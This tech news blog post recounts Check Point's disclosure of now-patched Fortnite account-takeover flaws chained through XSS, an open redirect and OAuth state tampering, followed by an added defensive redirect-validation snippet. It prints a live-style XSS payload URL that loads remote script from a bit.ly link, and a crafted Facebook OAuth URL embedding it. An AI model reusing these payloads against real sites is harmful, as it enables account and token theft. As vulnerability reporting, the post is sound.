Fortnite hack shows Epic Games was sloppy with Security

When you’re the most popular game in 2018, with almost 80 million users, with millions rolling in the door, you’d expect to spend a lot of time on security.

Researchers at Check Point Software Technologies discovered a vulnerability in the way tokens are issued when logging into Fortnite. It’s important to know 2 things about this up front:

  • This would theoretically allow a hacker to take ownership of your account, but it is currently understood that this has not impacted any Fortnite users.
  • Fortnite developers Epic Games have already fixed the vulnerabilities.

The vulnerabilities could have allowed hackers to:

  • Gain full access to a user’s account and personal information
  • Enable them to purchase virtual in-game currency using the victim’s payment card details
  • Listen to in-game chatter as well as surrounding sounds and conversations within the victim’s home or other location of play – a massive invasion of privacy

Details of the Hack

It seems Epic Games was playing a little fast and loose with old sub-domains, such as ‘http://ut2004stats.epicgames.com’. This domain was not hardened against a SQL Injection attack and when malicious code was tested, things started to unwind.

A GET request with the following path: “/serverstats.php?server=[some server code]” resulted in a response of ‘Server database error’. This gave the researchers a hint about where to proceed and proceed they did.

It was also discovered that the sub-domain ‘http://ut2004stats.epicgames.com’ contained a web page called “maps” which was vulnerable to a Cross-Site Scripting (XSS) attack.

They continued. With the knowledge they’d gained so far, they understood there was an issue with the login and proceeded to bang on the OAuth SSO mechanism.

To make it easy for users, Epic Games did what many sites do: use a generic SSO implementation to handle authenticating users from social media accounts like Facebook, Google, Xbox Live and PlayStation Network. It turns out there was a bug in this implementation that enabled an OAuth account takeover.

The login URL looked like this:

https://accounts.epicgames.com/login?productName=epic-games&lang=en_US&redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Fsite%2Fen-US%2Fhome&client_id=[client_id]&noHostRedirect=true

The poor implementation of the authentication to Epic’s servers enabled the researchers (and potentially bad actors) to manipulate the redirect URL and direct the user to any web page within the “*.epicgames.com” domain.

With the ability to control the “redirectUrl” parameter, they redirected the victim (their own test accounts) to ‘ut2004stats.epicgames.com’, the site that contained the XSS payload. Smart, and also scary.

http://ut2004stats.epicgames.com/index.php?stats=maps&SearchName=”><script%20src=%27%2f%2fbit.ly%2f2QlSHBO%27><%2fscript>

The JavaScript payload could then make a request to any SSO provider. A request to the SSO providers contains a “state” parameter, which is used later on by “accounts.epicgames.com” in order to complete the authentication process. The JavaScript payload contains a crafted “state” parameter. The “state” parameter value contained a Base64 encoded JSON and the JSON contained three keys, “redirectUrl”, “client_id” and “productName”. The “redirectUrl” parameter is used for redirection as the SSO login completes.

The researchers understood that the same process could also be recreated with each of the SSO providers mentioned above, using the same technique.

As a proof of concept, they chose to use Facebook.

The URL below shows they were able to craft the “state” parameter with a redirection to “ut2004stats.epicgames.com” with the XSS payload.

https://www.facebook.com/dialog/oauth?client_id=1132078350149238&redirect_uri=https://accounts.epicgames.com/OAuthAuthorized&state=eyJpc1BvcHVwIjoidHJ1ZSIsImlzQ3JlYXRlRmxvdyI6InRydWUiLCJpc1dlYiI6InRydWUiLCJvYXV0aFJlZGlyZWN0VXJsIjoiaHR0cDovL3V0MjAwNHN0YXRzLmVwaWNnYW1lcy5jb20vaW5kZXgucGhwP3N0YXRzPW1hcHMmU2VhcmNoTmFtZT0lMjIlM2UlM2NzY3JpcHQlMjBzcmM9JyUyZiUyZmJpdC5seSUyZjJRbFNIQk8nJTNlJTNjJTJmc2NyaXB0JTNlJTJmIyUyZiJ9&response_type=code&display=popup&scope=email,public_profile,user_friends

Facebook then responds by redirecting the user to “accounts.epicgames.com” with the manipulated state parameter.

Epic Games then takes the Facebook token and the attacker’s crafted “state” parameter and makes a request to Epic Games’ server in order to finish the authentication process.

Next, the server (Epic Games) generates a response with no input validation (one of the big issues) and redirects the user to “ut2004stats.epicgames.com” with the XSS payload and the Facebook token.

Finally, the user is redirected to the vulnerable web page where the XSS payload is executed and the authentication code is stolen.

At this stage, the attacker now has the user’s Facebook token and can successfully log in to the victim’s account.
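The missing input validation on the redirect target, shown as an added example (not Epic Games’ or Check Point’s code): it contrasts a wildcard “*.epicgames.com” match with an exact-origin allow-list applied to the redirect URL carried in the Base64 JSON “state”. The allow-list entries, the fallback URL, the function names and the sample state values are assumptions constructed for illustration.

```javascript
// Exact origins the login flow may redirect to (assumed list, for illustration only).
const ALLOWED_ORIGINS = new Set([
  'https://www.epicgames.com',
  'https://accounts.epicgames.com',
]);
const FALLBACK = 'https://www.epicgames.com/';

// Weak check modelled on the behaviour described above: any host under
// epicgames.com passes, so a forgotten sub-domain becomes a valid target.
function wildcardAllows(target) {
  try {
    const host = new URL(target).hostname;
    return host === 'epicgames.com' || host.endsWith('.epicgames.com');
  } catch {
    return false;
  }
}

// Strict check: absolute https URL, no embedded credentials, exact origin match.
function strictAllows(target) {
  let u;
  try { u = new URL(target); } catch { return false; }
  return u.protocol === 'https:' && u.username === '' && u.password === ''
    && ALLOWED_ORIGINS.has(u.origin);
}

// Decode the Base64 JSON "state" and return a redirect target that passed the
// strict check; anything malformed or off-list falls back to a fixed page.
function redirectFromState(stateB64) {
  let parsed;
  try {
    parsed = JSON.parse(Buffer.from(stateB64, 'base64').toString('utf8'));
  } catch {
    return FALLBACK;
  }
  const target = parsed && typeof parsed.redirectUrl === 'string' ? parsed.redirectUrl : '';
  return strictAllows(target) ? target : FALLBACK;
}

// Constructed sample states (client_id is a placeholder, not a real value).
const encode = (obj) => Buffer.from(JSON.stringify(obj)).toString('base64');
const base = { client_id: 'example-client', productName: 'epic-games' };
const legitState = encode({ ...base, redirectUrl: 'https://www.epicgames.com/site/en-US/home' });
const craftedState = encode({ ...base, redirectUrl: 'http://ut2004stats.epicgames.com/index.php?stats=maps' });

console.log(redirectFromState(legitState));   // allowed target is returned unchanged
console.log(redirectFromState(craftedState)); // off-list target is replaced by FALLBACK
```

The same check belongs on the “redirectUrl” query parameter of the login page, since both values end up in a redirect issued by the server.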

Thankfully, as I mentioned above, this is already patched, but it does serve as a great reminder that security is really important at every step in the process, as going sideways is often the method of attack.

You can read more information on the Fortnite hack at https://research.checkpoint.com/hacking-fortnite/

Creator of techAU, Jason has spent a dozen+ years covering technology in Australia and around the world. Bringing a background in multimedia and passion for technology to the job, Cartwright delivers detailed product reviews, event coverage and industry news on a daily basis.
2 Comments on this post.

  • Guy Cooper
    20 January 2019 at 8:33 pm

    Every day we see announcements of security breaches and something always on the forefront of our minds as business owners. However, it is disappointing to see such a simple breach from a company with such a large user base.

  • kelly
    18 February 2019 at 4:55 pm